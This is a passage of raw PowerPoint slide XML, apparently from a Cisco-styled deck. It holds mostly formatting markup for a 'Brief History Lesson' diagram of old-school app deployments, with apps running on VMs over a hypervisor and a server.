              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Old School App Deployments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Elbow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA0E36C1-FAE1-9C42-A5B7-A9AC25CAAB39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="0"/>
            <a:endCxn id="34" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4301459" y="3693680"/>
            <a:ext cx="351705" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Elbow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{543F344C-D485-014A-BAE4-118829B84318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="0"/>
            <a:endCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3784499" y="2516989"/>
            <a:ext cx="351705" cy="1033922"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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8E7CDB01-7FB5-F345-A81A-DF85ED5B9C6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="34" idx="0"/>
            <a:endCxn id="35" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4302515" y="3032894"/>
            <a:ext cx="351705" cy="2111"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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C38DBEB7-B996-A845-8C76-F094134330BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="34" idx="0"/>
            <a:endCxn id="36" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4820531" y="2514879"/>
            <a:ext cx="351705" cy="1038143"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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777FC55-8DFF-C249-9B5A-C1F1D8970B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3045388" y="2115005"/>
            <a:ext cx="900085" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D0BF4C6-7277-3149-A2AA-D80FCEFA80ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4079017" y="2115005"/>
            <a:ext cx="900085" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3987B90A-2B0E-724B-89E4-702E9C9F561E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112647" y="2112845"/>
            <a:ext cx="900085" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40C2DE61-950E-B244-ACFB-60AABD792871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3043301" y="1872716"/>
            <a:ext cx="900085" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A90B7F3-0236-A64E-9503-270BF13157C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4076931" y="1872716"/>
            <a:ext cx="900085" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B68B6D9-D940-DB43-AC1E-23F3FDE88332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110561" y="1870558"/>
            <a:ext cx="900085" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2560572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Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7134D7-3D8F-174D-AE56-7A01959C389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2270647" y="2845094"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM One</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AA6220-359E-E743-8FD8-C3A0A56996E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524458" y="4028714"/>
            <a:ext cx="2166966" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>SERVER ONE</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C5BD2EF-5CBB-EB4D-A153-8BB8D8EA6C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3524460" y="3480677"/>
            <a:ext cx="2166965" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>HYPERVISOR</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557F361B-BCC7-7845-B8E2-F6C18A85A95B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4112884" y="2831236"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM Two</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E97563F-0B9C-F14C-8534-8AB945859382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5963284" y="2835158"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM Three</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA54E651-7262-CF41-94F3-2FE11457EEE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692763" y="4563853"/>
            <a:ext cx="7995611" cy="449916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="16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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>All Applications Happy. More “Servers” to manage.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774FA1B5-2BA1-DB45-94AB-500D17F946B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620607" y="151068"/>
            <a:ext cx="5764376" cy="319204"/>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A Brief History Lesson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4495559-9397-6F4C-B152-0E49CF0F1DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747534" y="486830"/>
            <a:ext cx="7648931" cy="314882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
